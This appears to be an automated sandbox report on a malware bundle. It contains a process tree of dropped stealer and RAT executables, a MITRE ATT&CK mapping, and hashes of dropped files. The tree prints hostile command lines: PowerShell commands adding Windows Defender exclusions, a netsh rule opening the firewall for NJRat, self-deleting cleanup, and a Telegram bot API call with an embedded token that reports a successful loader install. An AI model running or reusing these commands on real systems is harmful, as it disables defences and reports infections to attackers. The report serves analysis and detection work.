        PID:2024
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
        9⤵
        
        PID:3448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4316
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
        9⤵
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3860
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\bav64.exe"
        9⤵
        
        PID:4848
        
        C:\Windows\System32\timeout.exe
        
        timeout /t 10 /nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5080
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@OFGADUSE: Installed success.'});"
        7⤵
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@OFGADUSE: Installed success.'});"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:372
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
        7⤵
        
        PID:1108
        
        C:\Windows\System32\timeout.exe
        
        timeout /t 14 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3608
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"
        7⤵
        
        PID:5064
        
        C:\Windows\System32\timeout.exe
        
        timeout /t 16 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1112
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4524
      - C:\Windows\system32\timeout.exe
        
        timeout /t 10 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:2040
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3048
- C:\Users\Admin\AppData\Local\Temp\Files\random.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
    "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2760
- C:\Users\Admin\AppData\Local\Temp\Files\major.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\major.exe"
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe" "NJRat.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3048
- C:\Users\Admin\AppData\Local\Temp\Files\w.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\w.exe"
  2⤵
  - Executes dropped EXE
  PID:1700
- C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\stealc_valenciga.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2860
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:4116
- C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3488
- - C:\Users\Admin\AppData\Local\Temp\3232512144.exe
    C:\Users\Admin\AppData\Local\Temp\3232512144.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:684
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:984
- C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1940
- - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
    C:\Users\Admin\AppData\Local\Temp\svchost015.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2996 -ip 2996
1⤵
PID:3856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2996 -ip 2996
1⤵
PID:1736

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4328

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:888

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1684
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\3836648720\payload.dat
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4664

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:868
- C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
  "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2728
- C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe
  "C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1640
- - C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe
    "C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3300
- C:\Users\Admin\AppData\Local\Temp\1002824001\06981094fb.exe
  "C:\Users\Admin\AppData\Local\Temp\1002824001\06981094fb.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:1480
- C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
  "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:888
- - C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3344
- C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe
  "C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DcomLaunch
1⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:2584
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
  2⤵
  PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:3488
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
  2⤵
  PID:3364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
  2⤵
  PID:764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'G:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:2140
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
  2⤵
  PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'H:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c arp -a
  2⤵
  - Network Service Discovery
  PID:4648
- - C:\Windows\system32\ARP.EXE
    arp -a
    3⤵
    - Network Service Discovery
    PID:2992
- C:\Windows\System32\cmd.exe
  cmd.exe /c start "" "c:\windows\system32\crypti.exe"
  2⤵
  PID:4468
- - \??\c:\windows\system32\crypti.exe
    "c:\windows\system32\crypti.exe"
    3⤵
    - Executes dropped EXE
    PID:1536

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI3407.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2608

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\msedge_installer.log
1⤵
- Opens file in notepad (likely ransom note)
PID:1536

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jusched.log
1⤵
- Opens file in notepad (likely ransom note)
PID:4052

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\chrome_installer.log
1⤵
- Opens file in notepad (likely ransom note)
PID:3524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:4308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffff6b0cc40,0x7ffff6b0cc4c,0x7ffff6b0cc58
  2⤵
  PID:4516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:2
  2⤵
  PID:4476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  PID:3936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2648 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3352,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3760,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4624 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4636,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:8
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3748,i,5809672111518440560,16092176087125536655,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:4536

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1168

C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1636

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1116

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4936
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Files\config
  2⤵
  PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BGHCGCAE

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\ECAKKKKJDBKKFIEBKEHD

Filesize
10KB

MD5
7bbf3bbb8df4118be58e7004d7a3e8a3

SHA1
e6e64f3c05d85b29dfda35032148ef5446b63d87

SHA256
4db16e4ec153a950ccc7f6631e6b3af98299406faf292075aa479dc98470a9b5

SHA512
524e85dc89dd4f433b20091fbd981fbd1e29a3547a7e4ba8e3df2829378435ede48c875d487b19c2bb224d0423b39cfedad11a2e57d65d2927c21448cfd245d5

Download Submit
C:\ProgramData\KJKJJJEC

Filesize
114KB

MD5
2dc3133caeb5792be5e5c6c2fa812e34

SHA1
0ed75d85c6a2848396d5dd30e89987f0a8b5cedb

SHA256
4b3998fd2844bc1674b691c74d67e56062e62bf4738de9fe7fb26b8d3def9cd7

SHA512
2ca157c2f01127115d0358607c167c2f073b83d185bdd44ac221b3792c531d784515a76344585ec1557de81430a7d2e69b286155986e46b1e720dfac96098612

Download Submit
C:\ProgramData\freebl3.dll

Filesize
80KB

MD5
7d3b49826686050826cc90c906909195

SHA1
05baf641dacf3061c8bb8f5acaf32413f44e424e

SHA256
43598979d707e9a8e1a35ac576f645fd3f15de5bd3b3e2eb62a32b3e18c9f764

SHA512
837f6e1be0cfc14cfd8f464989aaf21a2edf9b58f7915f71f648e5487c854a43f5e9c3be3a344b9dd281973f3b7ee5f7754b1386c8883194ebb1c2619099550d

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\mozglue.dll

Filesize
119KB

MD5
531554c09817bbde84c05e8a9e9f63fb

SHA1
2aa4d04eafc6a2a554c47ee2b1fe016c01d93c93

SHA256
51e14d9a384453de04ad65c037fa48ce7a752c984a417e00350f7e1f9f7d7688

SHA512
084b9a63acf36fba007eb5462e25e6696627324d6fc07608f5b465aa5e98bd79be76b0a6673a02448cd343d4300560a5aeda7c1eeaac1a0a4ccf9d36c919360b

Download Submit
C:\ProgramData\msvcp140.dll

Filesize
125KB

MD5
86e7d5e47892089dd4f653750c68026c

SHA1
9e9c359fdcd5984db0b4674fa8203c0a8adaa16b

SHA256
50d4d626b05575943b694a45dbbe6944d371e16f6e15c549398f64c0030c3377

SHA512
6782c7af07a5962eeb430b79f82d7e1dde47f1d46e92a8c4b62382e15ca9ce82e020df621a0ee00d5f129b84cbb8a78a9115777166948fc17ff40605fbd7f857

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\ProgramData\nss3.dll

Filesize
130KB

MD5
f22e1031a30abd63ca7e7fea9c89285e

SHA1
d9dcc868bba89965f37cadb51630c44f0cf1a186

SHA256
996525c42a780236d307fc7b8978bb6d827e4505b1d565442256b38f87fb512d

SHA512
99226dce7062bbd21165c000e82ed7a5292cedf6f35df5e02f6a944e26d964e0dbe33742d5a9b2d73904926a8e55250b41fca8b51a98c56d8fb611804acbdc69

Download Submit
C:\ProgramData\softokn3.dll

Filesize
140KB

MD5
395a240a5cdbca8a8025a8d8577b56e4

SHA1
8d85db6725b3f17daf72e17c0252d8b38e42823a

SHA256
3e27524a49a3ee42eddc8c4bd9dac7aa2132742b4abfd44c80d5806385f3bec0

SHA512
84740959962bb241e4be66f848424b83fd6f7d56c1c0aa8550a4a63a18e68e0271bd2220cf33557fc1ec60a408a3b7b1ecaac1859c7e197a39505ee0e22e2f35

Download Submit
C:\ProgramData\vcruntime140.dll

Filesize
78KB

MD5
a37ee36b536409056a86f50e67777dd7

SHA1
1cafa159292aa736fc595fc04e16325b27cd6750

SHA256
8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

SHA512
3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\03E91892B4C23DF04476485E943CD6E8263E00D0.temp

Filesize
18KB

MD5
53ca7b998409bfc859301f816b7fbd6e

SHA1
03e91892b4c23df04476485e943cd6e8263e00d0

SHA256
7e4130cbfbaf8e3c126535b91764c4eba5250ac5e517f2eb6b04c366bbde1dc6

SHA512
4a5c6166e0b5cef0e49afeb9008dc417919a9af6af335f845a1ab3a8e36447edcd50230715a2db3fd5393cbc1bd224f7cc508be2e738b98f08b06d0009426e17

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\05A6F5BAF8BF698BAA581139F782E9B33D26B0D1.temp

Filesize
19KB

MD5
85fe089a81e82131076eca1691d60bb2

SHA1
05a6f5baf8bf698baa581139f782e9b33d26b0d1

SHA256
441c50e7ba4a5807b7eba653850e0d48f31634d0a2c2f5b69e1e06acb3dcf5f7

SHA512
1f52dd82995050613d24febe4bc2b5bf3db3625a21d24a06165f63cd0b5fc7836d7b0270ed31709c70f2356037d7a89cb2ecbb02e5923325e5824fea2bb87cae

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\06D9F4CD22A98549A4CC9B439FFC6FCE53112175.temp

Filesize
19KB

MD5
c0fecb050c762035957bd89ebd4b4f45

SHA1
06d9f4cd22a98549a4cc9b439ffc6fce53112175

SHA256
6453a3fc0f47286f232049f7147300c363312493960a99ab7c40d7bed29a7da0

SHA512
3f4fed26f74c0c6754e99e4543e71ac63818355daf206b3fd2da5e42204e78660def08b830f84525685cd90992a74accd31fb2e1075df98939b835e368455ba0

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\0A6E95DAA685541E7628E07027BC826C750D235E.temp

Filesize
249KB

MD5
9650a706213f661ed95d687ab1adbe0e

SHA1
0a6e95daa685541e7628e07027bc826c750d235e

SHA256
9493a3ab3d194318a12a0c372c16ee19b9259859112c739e9c36a70a9125ee0f

SHA512
99848e3bb2e76cab35b5b58105ff35cf7e35f6b320b260cc51ea12c94aa1b9c3814ace07202189d840665405cd8c7fb0e1cdd306836f9d45f9ba6503781e5e83

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\1153800A293C31069F19035F07CF674ECFA5B5D6.temp

Filesize
22KB

MD5
a446a3fadd7082e74069c36f674b316f

SHA1
1153800a293c31069f19035f07cf674ecfa5b5d6

SHA256
63c8d4ea5fe1f6594dc4b72645bded89c2b637d79d65d0edfacc49f7dd9de960

SHA512
9a309e1a309c2bf141f81403850cbd756db2634a9df3704f05b6c32886f4a6bfe0f285636d56c87d39309cb6b72e2366cbb55b0bfc5822a9204d4c74e32637a6

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\13CAE78A6E3ED88BD840F186E0D31CCD8CA490B5.temp

Filesize
4.6MB

MD5
385f902ad28bc1dca79c2b236dc9c2e8

SHA1
13cae78a6e3ed88bd840f186e0d31ccd8ca490b5

SHA256
71f63bd32d22d2b8813dfe4d15bddbc4025860f2c87a041c4aed1da8f8f9d426

SHA512
342e02a8be7849f314944a25caa2cb1596cbce72e6f9074cadbf3006da35e608f95cb9fc1f8716f5bd2c42b84d2787e36156cc1ac131a4a687a92df23486136f

Download Submit
C:\Users\Admin\AppData\Local\Changguang\CG100\cache\16DEBCD1A74F4EBD5991E8E37CBD60AF96D7CBED.temp

Filesize
18KB

MD5
9ed94fee211a33c585601ccecb8028ff

SHA1
16debcd1a74f4ebd5991e8e37cbd60af96d7cbed

SHA256
4873913495c493c3b8e91637d00544f4a13e512bdbaaac629b89ea5cebb331f4

SHA512
